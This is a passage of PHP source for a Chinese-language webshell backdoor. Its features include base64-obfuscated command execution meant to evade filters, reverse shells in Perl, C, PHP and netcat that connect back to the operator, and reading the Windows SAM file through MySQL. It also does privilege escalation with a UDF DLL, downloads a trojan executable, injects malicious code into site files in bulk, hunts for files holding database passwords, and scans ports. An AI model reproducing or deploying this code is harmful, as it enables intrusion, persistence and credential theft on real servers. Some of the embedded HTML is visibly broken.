        echo "";for($i=0;$i<count($info);$i++){echo""."\n";}$registry_proxystring="";$Telnet="";$PcAnywhere="";try{$registry_proxystring=$shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber");$Telnet=$shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort");$PcAnywhere=$shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort");}catch(Exception$e){}echo""."\n";echo""."\n";echo""."\n";echo"

                
             
" . $info[$i][0] . "" . $info[$i][1] . "
  
        
          
          
          
         
              
              
              
            
        
         
Terminal Service端口为" . $registry_proxystring . "
  
         
Telnet端口为" . $Telnet . "
  
         
PcAnywhere端口为" . $PcAnywhere . "
  
         
";
        break;
    case "cmd":
        $res = "回显窗口";
        $cmd = "whoami";
        if (!empty($_POST['cmd'])) {
            $res = Exec_Run(base64_decode($_POST['cmd']));
            $cmd = htmlspecialchars(base64_decode($_POST['cmd']));
        }
        html_n("

执行命令新增很多隐藏函数,这个执行不了,除了反弹出来,绝对没有任何工具能执行命令!外加使用BASE64加密提交,防止被拦

命令参数  . $cmd . "\" οnkeydοwn=\"if(event.keyCode==13)SubmitUrl();\" style=\"width:399px;\">

	





");
        break;
    case "linux":
        $yourip = isset($_COOKIE['yourip']) ? $_COOKIE['yourip'] : getenv('REMOTE_ADDR');
        $yourport = isset($_COOKIE['yourport']) ? $_COOKIE['yourport'] : "12388";
        $system = strtoupper(substr(PHP_OS, 0, 3));
        html_n("
使用方法:

			先在自己电脑运行\"nc -vv -l 12388\"

			然后在此填写你电脑的IP,点连接!此反弹很全很实用!包括NC反弹!




你的地址  . $yourip . "\" style=\"width:400px\">


连接端口  . $yourport . "\" style=\"width:400px\">


执行方式 


");
        if ((!empty($_POST['yourip'])) && (!empty($_POST['yourport']))) {
            setcookie('yourip', $_POST['yourip']);
            setcookie('yourport', $_POST['yourport']);
            echo "
";
            if ($_POST['use'] == 'perl') {
                $back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
                echo File_Write("/tmp/envl_bc", base64_decode($back_connect_pl), 'wb') ? "创建/tmp/envl_bc成功
" : "创建/tmp/envl_bc失败
";
                $perlpath = Exec_Run('which perl');
                $perlpath = $perlpath ? chop($perlpath) : 'perl';
                @unlink("/tmp/envl_bc.c");
                echo Exec_Run($perlpath . " /tmp/envl_bc " . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? "nc -vv -l " . $_POST['yourport'] : "执行命令失败";
            }
            if ($_POST['use'] == 'c') {
                $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
                echo File_Write("/tmp/envl_bc.c", base64_decode($back_connect_c), 'wb') ? "创建/tmp/envl_bc.c成功
" : "创建/tmp/envl_bc.c失败
";
                $res = Exec_Run("gcc -o /tmp/envl_bc /tmp/envl_bc.c");
                @unlink("/tmp/envl_bc.c");
                echo Exec_Run("/tmp/envl_bc " . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? "nc -vv -l " . $_POST['yourport'] : "执行命令失败";
            }
            if ($_POST['use'] == 'php') {
                if (!extension_loaded('sockets')) {
                    if ($system == 'WIN') {
                        @dl('php_sockets.dll') or die("Can't load socket");
                    } else {
                        @dl('sockets.so') or die("Can't load socket");
                    }
                }
                if ($system == "WIN") {
                    $env = array('path' => "c:\\windows\\system32");
                } else {
                    $env = array('PATH' => "/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin");
                }
                $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
                $host = $_POST['yourip'];
                $port = $_POST['yourport'];
                $host = gethostbyname($host);
                $proto = getprotobyname("tcp");
                if (($sock = socket_create(AF_INET, SOCK_STREAM, $proto)) < 0) {
                    die("Socket创建失败");
                }
                if (($ret = socket_connect($sock, $host, $port)) < 0) {
                    die("连接失败");
                } else {
                    $message = "----------------------PHP反弹连接----------------------" . "\n";
                    socket_write($sock, $message, strlen($message));
                    $cwd = str_replace('\\', '/', dirname(__FILE__));
                    while ($cmd = socket_read($sock, 65535, $proto)) {
                        if (trim(strtolower($cmd)) == "exit") {
                            socket_write($sock, "Bye\n");
                            exit;
                        } else {
                            $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
                            if (is_resource($process)) {
                                fwrite($pipes[0], $cmd);
                                fclose($pipes[0]);
                                $msg = stream_get_contents($pipes[1]);
                                socket_write($sock, $msg, strlen($msg));
                                fclose($pipes[1]);
                                $msg = stream_get_contents($pipes[2]);
                                socket_write($sock, $msg, strlen($msg));
                                $return_value = proc_close($process);
                            }
                        }
                    }
                }
            }
            if ($_POST['use'] == 'nc') {
                echo "
";
                $mip = $_POST['yourip'];
                $bport = $_POST['yourport'];
                $fp = fsockopen($mip, $bport, $errno, $errstr);
                if (!$fp) {
                    $result = "Error: could not open socket connection";
                } else {
                    fputs($fp, "\n*********************************************\n " . "is ok" . "\n*********************************************\n\n");
                    while (!feof($fp)) {
                        fputs($fp, " [[email protected]:/root]# ");
                        $result = fgets($fp, 4096);
                        $message = `$result`;
                        fputs($fp, "--> " . $message . "\n");
                    }
                    fclose($fp);
                }
                echo "
";
            }
            echo "
你可以尝试连接端口 (nc -vv -l " . $_POST['yourport'] . ') ';
        }
        break;
    case "sqlshell":
        $MSG_BOX = '';
        $mhost = 'localhost';
        $muser = 'root';
        $mport = '3306';
        $mpass = '';
        $mdata = 'mysql';
        $msql = "select version();";
        if (isset($_POST['mhost']) && isset($_POST['muser'])) {
            $mhost = $_POST['mhost'];
            $muser = $_POST['muser'];
            $mpass = $_POST['mpass'];
            $mdata = $_POST['mdata'];
            $mport = $_POST['mport'];
            if ($conn = @mysql_connect($mhost . ':' . $mport, $muser, $mpass)) @mysql_select_db($mdata); else $MSG_BOX = "连接MYSQL失败";
        }
        $downfile = "c:/windows/repair/sam";
        if (!empty($_POST['downfile'])) {
            $downfile = File_Str($_POST['downfile']);
            $binpath = bin2hex($downfile);
            $query = "select load_file(0x" . $binpath . ')';
            if ($result = @mysql_query($query, $conn)) {
                $k = 0;
                $downcode = '';
                while ($row = @mysql_fetch_array($result)) {
                    $downcode .= $row[$k];
                    $k++;
                }
                $filedown = basename($downfile);
                if (!$filedown) $filedown = "envl.tmp";
                $array = explode('.', $filedown);
                $arrayend = array_pop($array);
                header("Content-type: application/x-" . $arrayend);
                header("Content-Disposition: attachment; filename=" . $filedown);
                header("Content-Length: " . strlen($downcode));
                echo $downcode;
                exit;
            } else $MSG_BOX = "下载文件失败";
        }
        $o = isset($_GET['o']) ? $_GET['o'] : '';
        html_n("



[MYSQL执行语句]
[MYSQL上传文件]
[MYSQL下载文件]



地址  . $mhost . "\" style=\"width:110px\">
端口  . $mport . "\" style=\"width:110px\">
用户  . $muser . "\" style=\"width:110px\">
密码  . $mpass . "\" style=\"width:110px\">
库名  . $mdata . "\" style=\"width:110px\">



");
        if ($o == 'u') {
            $uppath = "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/exp.vbs";
            if (!empty($_POST['uppath'])) {
                $uppath = $_POST['uppath'];
                $query = "Create TABLE a (cmd text NOT NULL);";
                if (@mysql_query($query, $conn)) {
                    if ($tmpcode = File_Read($_FILES['upfile']['tmp_name'])) {
                        $filecode = bin2hex(File_Read($tmpcode));
                    } else {
                        $tmp = File_Str(dirname(myaddress)) . "/upfile.tmp";
                        if (File_Up($_FILES['upfile']['tmp_name'], $tmp)) {
                            $filecode = bin2hex(File_Read($tmp));
                            @unlink($tmp);
                        }
                    }
                    $query = "Insert INTO a (cmd) VALUES(CONVERT(0x" . $filecode . ",CHAR));";
                    if (@mysql_query($query, $conn)) {
                        $query = "SELECT cmd FROM a INTO DUMPFILE '" . $uppath . "';";
                        $MSG_BOX = @mysql_query($query, $conn) ? "上传文件成功" : "上传文件失败";
                    } else $MSG_BOX = "插入临时表失败";
                    @mysql_query("Drop TABLE IF EXISTS a;", $conn);
                } else $MSG_BOX = "创建临时表失败";
            }
            html_n("

上传路径  . $uppath . "\" style=\"width:500px\">


选择文件 

");
        } elseif ($o == 'd') {
            html_n("


下载文件  . $downfile . "\" style=\"width:500px\">

");
        } else {
            if (!empty($_POST['msql'])) {
                $msql = $_POST['msql'];
                $msql = base64_decode($msql);
                if ($result = @mysql_query($msql, $conn)) {
                    $MSG_BOX = "执行SQL语句成功
";
                    $k = 0;
                    while ($row = @mysql_fetch_array($result)) {
                        $MSG_BOX .= $row[$k];
                        $k++;
                    }
                } else $MSG_BOX .= ":" . @mysql_error();
            }
            html_n("




");
        }
        if ($MSG_BOX != '') echo "
" . $MSG_BOX . "
"; else echo "
";
        break;
    case "downloader":
        $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : "http://" . getenv('REMOTE_ADDR') . "/down/muma.exe";
        $Com_dpath = isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress) . "/muma.exe");
        html_n("

    
超连接  . $Com_durl . "\" type=\"text\" style=\"width:600px;\">

    
下载到  . $Com_dpath . "\" type=\"text\" style=\"width:600px;\">

    
");
        if ((!empty($_POST['durl'])) && (!empty($_POST['dpath']))) {
            echo "
";
            $contents = @implode('', @file($_POST['durl']));
            if (!$contents) echo "无法读取要下载的数据"; else echo File_Write($_POST['dpath'], $contents, 'wb') ? "下载文件成功" : "下载文件失败";
            echo "
";
        }
        break;
    case "upfiles":
        html_n("服务器限制上传单个文件大小: " . @get_cfg_var('upload_max_filesize') . "
");
        html_input("text", "uppath", root_dir, "
上传到路径: ", "51");
        html_n("





          

            
            
            
          






请选择要上传的文件:


 


");
        html_n("
  . root_dir . "';\" style=\"width:80px;\">");
        if (isset($_POST['upfiles'])) {
            foreach ($_FILES["upfile"]["error"] as $key => $error) {
                if ($error == UPLOAD_ERR_OK) {
                    $tmp_name = $_FILES["upfile"]["tmp_name"][$key];
                    $name = $_FILES["upfile"]["name"][$key];
                    $uploadfile = str_path($_POST['uppath'] . '/' . $name);
                    $upload = @copy($tmp_name, $uploadfile) ? $name . $msg[2] : @move_uploaded_file($tmp_name, $uploadfile) ? $name . $msg[2] : $name . $msg[3];
                    echo "

" . $upload;
                }
            }
        }
        html_n("");
        break;
    case "guama":
        $patht = isset($_POST['path']) ? $_POST['path'] : root_dir;
        $typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx";
        $codet = isset($_POST['code']) ? $_POST['code'] : "";
        html_n("文件类型请用\"|\"隔开,也可以是指定文件名.

");
        html_input("text", "path", $patht, "路径范围", "45");
        html_input("checkbox", "pass", "", "使用目录遍历", "", true);
        html_input("text", "type", $typet, "

文件类型", "60");
        html_text("code", "67", "5", $codet);
        html_n("

");
        html_radio("批量挂马", "批量清马", "guama", "qingma");
        html_input("submit", "passreturn", "开始");
        html_n(""
);
        if (!empty($_POST['path'])) {
            html_n("目标文件:

");
            if (isset($_POST['pass'])) $bool = true; else $bool = false;
            do_passreturn($patht, $codet, $_POST['return'], $bool, $typet);
        }
        break;
    case "tihuan":
        $newcode = isset($_POST['newcode']) ? $_POST['newcode'] : "";
        $oldcode = isset($_POST['oldcode']) ? $_POST['oldcode'] : "";
        html_n("此功能可批量替换文件内容,请小心使用.

");
        html_input("text", "path", root_dir, "路径范围", "45");
        html_input("checkbox", "pass", "", "使用目录遍历", "", true);
        html_text("newcode", "67", "5", $newcode);
        html_n("

替换为");
        html_text("oldcode", "67", "5", $oldcode);
        html_input("submit", "passreturn", "替换", "

");
        html_n(""
);
        if (!empty($_POST['path'])) {
            html_n("目标文件:

");
            if (isset($_POST['pass'])) $bool = true; else $bool = false;
            do_passreturn($_POST['path'], $_POST['newcode'], "tihuan", $bool, $_POST['oldcode']);
        }
        break;
    case "scanfile":
        $code = isset($_POST['code']) ? $_POST['code'] : "";
        css_js("4");
        html_n("此功能可很方便的搜索到保存MYSQL用户密码的配置文件,用于提权.
当服务器文件太多时,会影响执行速度,不建议使用目录遍历.

");
        html_input("text", "path", root_dir, "路径名", "45");
        html_input("checkbox", "pass", "", "使用目录遍历", "", true);
        html_input("text", "code", $code, "

关键字", "40");
        html_select(array("--MYSQL配置文件--", "Discuz", "PHPWind", "phpcms", "dedecms", "PHPBB", "wordpress", "sa-blog", "o-blog", "dedecms", "phpcms"), 0, "οnchange='return Fulll(options[selectedIndex].value)'");
        html_n("

");
        html_radio("搜索文件名", "搜索包含文字", "scanfile", "scancode");
        html_input("submit", "passreturn", "搜索");
        html_n(""
);
        if (!empty($_POST['path'])) {
            html_n("找到文件:

");
            if (isset($_POST['pass'])) $bool = true; else $bool = false;
            do_passreturn($_POST['path'], $_POST['code'], $_POST['return'], $bool);
        }
        break;
    case "scanphp":
        html_n("原理是根据特征码定义的,请查看代码判断后再进行删除.

");
        html_input("text", "path", root_dir, "查找范围", "40");
        html_input("checkbox", "pass", "", "使用目录遍历

脚本类型", "", true);
        html_select(array("php" => "PHP", "asp" => "ASP", "aspx" => "ASPX", "jsp" => "JSP"));
        html_input("submit", "passreturn", "查找", "

");
        html_n(""
);
        if (!empty($_POST['path'])) {
            html_n("找到文件:

");
            if (isset($_POST['pass'])) $bool = true; else $bool = false;
            do_passreturn($_POST['path'], $_POST['class'], "scanphp", $bool);
        }
        break;
    case "port":
        $Port_ip = isset($_POST['ip']) ? $_POST['ip'] : "127.0.0.1";
        $Port_port = isset($_POST['port']) ? $_POST['port'] : "21|23|25|80|110|135|139|445|1433|3306|3389|43958|5631|2049|873";
        html_n("


扫描IP  . $Port_ip . "\" style=\"width:600px;\"> 


端口号  . $Port_port . "\" style=\"width:597px;\">




");
        if ((!empty($_POST['ip'])) && (!empty($_POST['port']))) {
            echo "
";
            $ports = explode('|', $_POST['port']);
            for ($i = 0; $i < count($ports); $i++) {
                $fp = @fsockopen($_POST['ip'], $ports[$i], $errno, $errstr, 2);
                echo $fp ? "开放端口 ---> " . $ports[$i] . "
" : "关闭端口 ---> " . $ports[$i] . "
";
                ob_flush();
                flush();
            }
            echo "
";
        }
        break;
    case "getcode":
        if (isset($_POST['url'])) {
            $proxycontents = @implode('', @file($_POST['url']));
            $proxycontents2 = $proxycontents;
            $proxycontents = @TestUtf8($proxycontents) ? @iconv("utf-8", "gb2312//IGNORE", $proxycontents) : $proxycontents;
            if (empty($proxycontents))
                $proxycontents = $proxycontents2;
            echo ($proxycontents) ? $proxycontents : "

获取 URL 内容失败
";
            exit;
        }
        html_n("

 

  

	在线代理
  

  

	
  • 用本功能仅实现简单的 HTTP 代理,不会显示使用相对路径的图片、链接及CSS样式表.
  • 用本功能可以通过本服务器浏览目标URL,但不支持 SQL Injection 探测以及某些特殊字符.
  • 用本功能浏览的 URL,在目标主机上留下的IP记录是 : " . $_SERVER['SERVER_NAME'] . "

  

  

	URL: 
 

  

  

	
  


");
        break;
    case "phpcode":
        $phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();";
        if ($phpcode != "phpinfo();") $phpcode = htmlspecialchars(myunescape(base64_decode($phpcode)));
        echo "
不用写<? ?>标签,此功能优化使用BASE64加密传送,防止恶意代码被拦,用了就知道



";
        if (!empty($_POST['phpcode'])) {
            echo "

";
            eval(stripslashes(myunescape(base64_decode($_POST['phpcode']))));
        }
        html_n(""
);
        break;
    case "myexp":
        $MSG_BOX = "请先导出DLL,再执行命令.MYSQL用户必须为root权限,导出路径必须能加载DLL文件.";
        $info = "命令回显";
        $mhost = 'localhost';
        $muser = 'root';
        $mport = '3306';
        $mpass = '';
        $mdata = 'mysql';
        $mpath = "C:/windows/mysqlDll.dll";
        $sqlcmd = 'ver';
        if (isset($_POST['mhost']) && isset($_POST['muser'])) {
            $mhost = $_POST['mhost'];
            $muser = $_POST['muser'];
            $mpass = $_POST['mpass'];
            $mdata = $_POST['mdata'];
            $mport = $_POST['mport'];
            $mpath = File_Str($_POST['mpath']);
            $sqlcmd = $_POST['sqlcmd'];
            $conn = @mysql_connect($mhost . ':' . $mport, $muser, $mpass);
            if ($conn) {
                @mysql_select_db($mdata);
                if ((!empty($_POST['outdll'])) && (!empty($_POST['mpath']))) {
                    $query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";
                    if (@mysql_query($query, $conn)) {
                        $shellcode = Mysql_shellcode();
                        $query = "INSERT into Envl_Temp_Tab values (CONVERT(" . $shellcode . ",CHAR));";
                        if (@mysql_query($query, $conn)) {
                            $query = "SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE '" . $mpath . "';";
                            if (@mysql_query($query, $conn)) {
                                $ap = explode('/', $mpath);
                                $inpath = array_pop($ap);
                                $query = "Create Function state returns string soname '" . $inpath . "';";
                                $MSG_BOX = @mysql_query($query, $conn) ? "安装DLL成功" : "安装DLL失败";
                            } else $MSG_BOX = "导出DLL文件失败";
                        } else $MSG_BOX = "写入临时表失败";
                        @mysql_query("DROP TABLE Envl_Temp_Tab;", $conn);
                    } else $MSG_BOX = "创建临时表失败";
                }
                if (!empty($_POST['runcmd'])) {
                    $query = "select state(\"" . $sqlcmd . "\");";
                    $result = @mysql_query($query, $conn);
                    if ($result) {
                        $k = 0;
                        $info = NULL;
                        while ($row = @mysql_fetch_array($result)) {
                            $infotmp .= $row[$k];
                            $k++;
                        }
                        $info = $infotmp;
                        $MSG_BOX = "执行成功";
                    } else $MSG_BOX = "执行失败";
                }
            } else $MSG_BOX = "连接MYSQL失败";
        }
        html_n("



" . $MSG_BOX . "



地址  . $mhost . "\" style=\"width:110px\">
端口  . $mport . "\" style=\"width:110px\">
用户  . $muser . "\" style=\"width:110px\">
密码  . $mpass . "\" style=\"width:110px\">
库名  . $mdata . "\" style=\"width:110px\">


可加载路径  . $mpath . "\" style=\"width:555px\">



安装成功后可用 
 . $sqlcmd . "\" style=\"width:515px;\">






");
        break;
    case "mysql_exec":
        $cookie_name_mysql = $envlpath . "mysql";
        if (isset($_COOKIE[$cookie_name_mysql . "user"])) {
            die("");
        }
        if (isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass'])) {
            if (@mysql_connect($_POST['mhost'] . ':' . $_POST['mport'], $_POST['muser'], $_POST['mpass'])) {
                $cookietime = time() + 6 * 3600;
                setcookie($cookie_name_mysql . 'host', $_POST['mhost'], $cookietime);
                setcookie($cookie_name_mysql . 'port', $_POST['mport'], $cookietime);
                setcookie($cookie_name_mysql . 'user', $_POST['muser'], $cookietime);
                setcookie($cookie_name_mysql . 'pass', $_POST['mpass'], $cookietime);
                die("正在登陆,请稍候...");
            } else {
                echo "登陆失败";
            }
        }
        html_n("


地址 


端口 


用户 


密码 




");
        break;
    case "mysql_msg":
        $cookie_name_mysql = $envlpath . "mysql";
        $conn = @mysql_connect($_COOKIE[$cookie_name_mysql . 'host'] . ':' . $_COOKIE[$cookie_name_mysql . 'port'], $_COOKIE[$cookie_name_mysql . 'user'], $_COOKIE[$cookie_name_mysql . 'pass']);
        if ($conn) {
            html_n("");
            $BOOL = false;
            $MSG_BOX = "用户:" . $_COOKIE[$cookie_name_mysql . 'user'] . "      地址:" . $_COOKIE[$cookie_name_mysql . 'host'] . ':' . $_COOKIE[$cookie_name_mysql . 'port'] . "      版本:";
            $k = 0;
            $result = @mysql_query("select version();", $conn);
            while ($row = @mysql_fetch_array($result)) {
                $MSG_BOX .= $row[$k];
                $k++;
            }
            echo "
 数据库:";
            $result = @mysql_query("SHOW DATABASES", $conn);
            while ($db = @mysql_fetch_array($result)) {
                echo "  [ . $db['Database'] . '">' . $db['Database'] . "]";
            }
            echo "
";
            if (isset($_GET['db'])) {
                @mysql_select_db($_GET['db'], $conn);
                $textarea = "";
                $querya = "";
                $queryb = "";
                $queryc = "";
                if (isset($_POST['nsql'])) {
                    $_POST['nsql'] = base64_decode($_POST['nsql']);
                    $textarea = $_POST['nsql'];
                    $BOOL = true;
                    $MSG_BOX = @mysql_query($_POST['nsql'], $conn) ? "执行成功" : "执行失败 " . @mysql_error();
                }
                if (isset($_POST['insql']) && is_array($_POST['insql'])) {
                    $query = "INSERT INTO " . $_GET['table'] . ' (';
                    foreach ($_POST['insql'] as $var => $key) {
                        $querya .= $var . ',';
                        $queryb .= '\'' . addslashes($key) . '\',';
                    }
                    $query = $query . substr($querya, 0, -1) . ') VALUES (' . substr($queryb, 0, -1) . ');';
                    $MSG_BOX = @mysql_query($query, $conn) ? "添加成功" : "添加失败 " . @mysql_error();
                }
                if (isset($_POST['upsql']) && is_array($_POST['upsql'])) {
                    $query = 'UPDATE ' . $_GET['table'] . ' SET ';
                    foreach ($_POST['upsql'] as $var => $key) {
                        $queryb .= $var . '=\'' . addslashes($key) . '\',';
                    }
                    $query = $query . substr($queryb, 0, -1) . ' ' . base64_decode($_POST['wherevar']) . ';';
                    $MSG_BOX = @mysql_query($query, $conn) ? "修改成功" : "修改失败 " . @mysql_error();
                }
                if (isset($_GET['del'])) {
                    $result = @mysql_query("SELECT * FROM " . $_GET['table'] . ' LIMIT ' . $_GET['del'] . ', 1;', $conn);
                    $good = @mysql_fetch_assoc($result);
                    $query = "DELETE FROM " . $_GET['table'] . ' WHERE ';
                    foreach ($good as $var => $key) {
                        $queryc .= $var . '=\'' . addslashes($key) . '\' AND ';
                    }
                    $where = $query . substr($queryc, 0, -4) . ';';
                    $MSG_BOX = @mysql_query($where, $conn) ? "删除成功" : "删除失败 " . @mysql_error();
                }
                $action = "?eanver=mysql_msg&db=" . $_GET['db'];
                if (isset($_GET['drop'])) {
                    $query = "Drop TABLE IF EXISTS " . $_GET['drop'] . ';';
                    $MSG_BOX = @mysql_query($query, $conn) ? "删除成功" : "删除失败 " . @mysql_error();
                }
                if (isset($_GET['table'])) {
                    $action .= '&table=' . $_GET['table'];
                    if (isset($_GET['edit'])) $action .= '&edit=' . $_GET['edit'];
                }
                if (isset($_GET['insert'])) $action .= '&insert=' . $_GET['insert'];
                echo "
 . $action . "\" name=\"gform\" id=\"gform\">";
                echo " ";
                echo "   
" . $MSG_BOX . "
 . $_GET['db'] . '">' . $_GET['db'] . " ---> ";
                if (isset($_GET['table'])) {
                    echo " . $_GET['db'] . '&table=' . $_GET['table'] . '">' . $_GET['table'] . ' ';
                    echo "[ . $_GET['db'] . '&insert=' . $_GET['table'] . "\">插入]
";
                    if (isset($_GET['edit'])) {
                        if (isset($_GET['p'])) $atable = $_GET['table'] . '&p=' . $_GET['p']; else $atable = $_GET['table'];
                        echo "
 . $_GET['db'] . '&table=' . $atable . '">';
                        $result = @mysql_query("SELECT * FROM " . $_GET['table'] . ' LIMIT ' . $_GET['edit'] . ', 1;', $conn);
                        $good = @mysql_fetch_assoc($result);
                        $u = 0;
                        foreach ($good as $var => $key) {
                            $queryc .= $var . '=\'' . $key . '\' AND ';
                            $type = @mysql_field_type($result, $u);
                            $len = @mysql_field_len($result, $u);
                            echo "
" . $var . " " . $type . '(' . $len . ")
";
                            $u++;
                        }
                        $where = 'WHERE ' . substr($queryc, 0, -4);
                        echo " . base64_encode($where) . "\">
";
                    } else {
                        $query = "SHOW COLUMNS FROM " . $_GET['table'];
                        $result = @mysql_query($query, $conn);
                        $fields = array();


                        /*
                         *
                        $pagesize = 20;
                        $row_num = mysql_num_rows(mysql_query("SELECT * FROM " . $_GET['table'], $conn));
                        $numrows = $row_num;
                        $pages = intval($numrows / $pagesize);
                        if ($numrows % $pagesize) $pages++;
                        $offset = $pagesize * ($page - 1);
                        $page = $_GET['p'];
                        if (!$page) $page = 1;
                        if (!isset($_GET['p'])) {
                            $p = 0;
                            $_GET['p'] = 1;
                        } else $p = ((int)$_GET['p'] - 1) * 20;
                         *
                         *
                         *
                         *
                         */

                        $pagesize = 20;
                        $row_num = @mysql_num_rows(@mysql_query("SELECT * FROM " . $_GET['table'], $conn));
                        $numrows = $row_num;
                        $pages = intval($numrows / $pagesize);
                        if ($numrows % $pagesize) $pages++;
                        if (!isset($_GET['p'])) {
                            $p = 0;
                            $_GET['p'] = 1;
                        } else {
                            $p2 = ((int)$_GET['p']);
                            if ($p2 > $pages)
                                $p2 = $pages;
                            else if ($p2 < 1)
                                $p2 = 1;
                            $p = ($p2 - 1) * 20;
                            $_GET['p'] = $p2;
                        }
                        $page = $_GET['p'];
                        $offset = $pagesize * ($page - 1);


                        echo "";echo"";while($row= @mysql_fetch_assoc($result)){array_push($fields,$row['Field']);echo"";}echo"";$nsql=isset($_POST['nsql'])?$_POST['nsql']:"";if(preg_match('/WHERE|LIMIT/',$nsql)&&preg_match('/SELECT|FROM/',$nsql))$query=$nsql;else$query="SELECT * FROM ".$_GET['table'].' LIMIT '.$p.', 20;';$result= @mysql_query($query,$conn);$v=$p;while($text= @mysql_fetch_assoc($result)){echo"";foreach($fieldsas$row){echo'";}echo""."\r\n";$v++;}echo"

                         操作
                           
                             
                             " . $row['Field'] . "
                        
                         

                              
                             
                              
                        
                                      
                          
                          
                           
                             
 . $_GET['db'] . "&table=" . $_GET['table'] . '&p=' . $_GET['p'] . '&edit=' . $v . "\"> 修改   . $_GET['db'] . "&table=" . $_GET['table'] . '&p=' . $_GET['p'] . '&del=' . $v . "');return false;\"> 删除 
                                
                                 ' . nl2br(htmlspecialchars(Mysql_Len($text[$row], 500))) . "
                            
                             
  
                            
                        
                         
";
                        $pagep = $page - 1;
                        $pagen = $page + 1;
                        echo "共有 " . $row_num . " 条记录 ";
                        $pagenav = "";
                        $pageStr = $row_num > 0 ? $page : "0";
                        $charseta = isset($_GET['charset']) ? $_GET['charset'] : "";
                        if ($pagep > 0) $pagenav .= "  ] . "&table=" . $_GET['table'] . "&p=1&charset=" . $charseta . "'>首页 ] . "&table=" . $_GET['table'] . "&p=" . $pagep . "&charset=" . $charseta . "'>上一页 "; else $pagenav .= " 上一页 ";
                        if ($pagen <= $pages) $pagenav .= " ] . "&table=" . $_GET['table'] . "&p=" . $pagen . "&charset=" . $charseta . "'>下一页 ] . "&table=" . $_GET['table'] . "&p=" . $pages . "&charset=" . $charseta . "'>尾页"; else $pagenav .= " 下一页 ";
                        $pagenav .= " 第 [" . $pageStr . "/" . $pages . "] 页   跳到 . $_GET['db'] . "&table=" . $_GET['table'] . "&p='+this.value+'&charset=" . $charseta . "';\" />页";
                        echo $pagenav;
                        echo "
";
                    }
                } elseif (isset($_GET['insert'])) {
                    echo " . $_GET['db'] . "&table=" . $_GET['insert'] . '">' . $_GET['insert'] . "
";
                    $result = @mysql_query("SELECT * FROM " . $_GET['insert'], $conn);
                    $fieldnum = @mysql_num_fields($result);
                    echo "
 . $_GET['db'] . "&table=" . $_GET['insert'] . '">';
